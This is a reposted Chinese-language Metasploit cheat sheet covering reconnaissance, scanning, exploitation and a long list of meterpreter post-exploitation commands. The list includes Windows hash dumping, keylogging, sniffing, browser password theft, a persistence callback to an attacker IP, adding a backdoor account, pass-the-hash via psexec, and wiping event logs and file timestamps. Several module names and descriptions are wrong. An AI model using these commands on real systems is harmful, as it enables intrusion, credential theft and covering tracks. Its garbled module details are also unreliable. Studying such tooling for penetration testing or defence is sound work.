Metaspolit使用簡介


信息收集階段


Whois信息收集

msf auxiliary > whois baidu.com

域名信息查詢階段

msf auxiliary > nslookup www.baidu.com
msf auxiliary > dig @114.114.114.114 www.baidu.com 


主機端口探測階段

直接使用PING命令探測連通性
ping 1.2.3.4

msf > use auxiliary/scanner/discovery/arp_sweep
msf > set RHOSTS 1.1.1.0/24
msf > set THREADS 50
msf > run

使用NMAP探測
msf > nmap command

服務掃描打點

telnet服務:use auxiliary/scanner/telnet/telnet_version
ssh服務:use auxiliary/scanner/ssh/telnet_version
Oracle服務:use auxiliary/scanner/oracle/tnslsnr_version
http服務:use auxiliary/scanner/http/open_proxy

口令探測

ssh服務:use auxiliary/scanner/ssh/telnet_login
ftp服務:use auxiliary/sniffer/psnuffle

漏洞掃描階段


那是nessus openVAS等的天下,可以利用PostgreSQL數據庫進行聯動

MSF框架下的WEB滲透


為什么不用burpsuite呢,用burpsuite更好
還有SQLMAP啊,還有好多其他的啊,啦啦啦

漏洞利用階段


選擇合適的漏洞利用payload和攻擊腳本即可

use xxx
set payload xxx

強大的meterpreter


meterpreter > background 后台運行meterpreter
meterpreter > sessions 列出session,選擇交互session的話 使用session -i  x
msterpreter > shell 
msterpreter > cat xxxxx 查看文件
msterpreter > getwd/getlwd  獲取當下路徑
msterpreter > upload xxx.exe c:\  上傳文件或文件夾
msterpreter > download c:\\"Program Files"\\xxx\\xxx\\xxx  ./  下載文件
msterpreter > edit 使用vi編輯器編輯目標機上的文件
msterpreter > search 搜索目標上的文件
msterpreter > ipconfig 查看網絡信息
msterpreter > portfwd add -l 1234 -p 3389 -r 1.2.3.4 將目標機的3389 轉發到本地1234端口
msterpreter > route 查看目標機的路由信息
msterpreter > ps  查看進程表
msterpreter > migrate 轉移shell到進程
msterpreter > execute -H -f cmd.exe 隱藏執行cmd
msterpreter > execute -H -i -f cmd.exe 可以與cmd交互了 -m 參數直接在內存執行供給端的可執行文件 execute -H -m -d xxx.exe -f xxx.exe -a "-o xxxx.txt" 
msterpreter > getpid 獲取當前會話所在進程的pid
msterpreter > getuid /whoami 獲取自己是誰
msterpreter > sysinfo  查看系統信息
msterpreter > kill 殺掉進程
msterpreter > shutdown關機
msterpreter > hashdump 獲取windows 的hash口令
msterpreter > run persistence -X -i 5 -p 443 -r 192.168.10.141
msterpreter > run metsvc #吧31337端口打開監聽meterpreter
msterpreter > run getgui -u metaspolit -p meterpreter 添加賬戶metaspolit 密碼meterpreter
msterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up_xxxxxxxx.xxxx.rc
msterpreter > getsystem 提權
msterpreter > run post/windows/gather/dumplinks 獲取最近處理的文檔
msterpreter > run post/windows/gather/enum_applications 獲取安裝的程序
msterpreter > keyscan_start 鍵盤記錄
msterpreter > keyscan_dump 
msterpreter > keyscan_stop 關閉
msterpreter > use sniffer #網絡監聽獲取密碼
msterpreter > sniffer_interface
msterpreter > sniffer_start 1
msterpreter > sniffer_dump 1 /tmp/xxx.pcap 
msterpreter > sniffer_stop 1
msterpreter > run post/windows/gather/enum_ie 瀏覽器獲取密碼
msterpreter > run windows/gather/smart_hashdump 獲取系統口令
msterpreter > run get_local_subnets 添加路由 
msterpreter > background 后 route add a.b.c.d x.x.x.x 1 然后查看route print 
msf > use exploit/windows/smb/psexec
msf > set RHOST RPORT LHOST ...
msf > set SMBPass hash值
msf > exploit
msterpreter > clearev 刪除日志
msterpreter >timestomp 停止修改文件屬性的時間記錄


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM